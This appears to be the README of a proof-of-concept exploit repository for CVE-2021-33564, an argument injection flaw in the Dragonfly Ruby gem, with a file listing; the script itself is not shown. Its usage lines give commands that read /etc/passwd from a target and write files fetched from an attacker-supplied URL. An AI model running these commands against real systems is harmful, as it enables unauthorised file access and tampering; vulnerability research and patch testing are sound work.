Argument Injection in Dragonfly Ruby Gem# CVE-2021-33564 PoC
Exploit script for CVE-2021-33564 (Argument Injection in Dragonfly Ruby Gem).
## Usage
### Arbitrary File Read
`python3 poc.py -u https://<target_url>/system/refinery/images -r /etc/passwd`
### Arbitrary File Write
`python3 poc.py -u https://<target_url>/system/refinery/images -w public/test.txt -c test.txt -lu http://<local_url>`
For more information, please visit the blog.
[4.0K] /data/pocs/74388578ca3480d3acff8f29c99da778b411d57f
├── [2.2K] poc.py
├── [ 405] README.md
└── [ 18] requirements.txt
0 directories, 3 files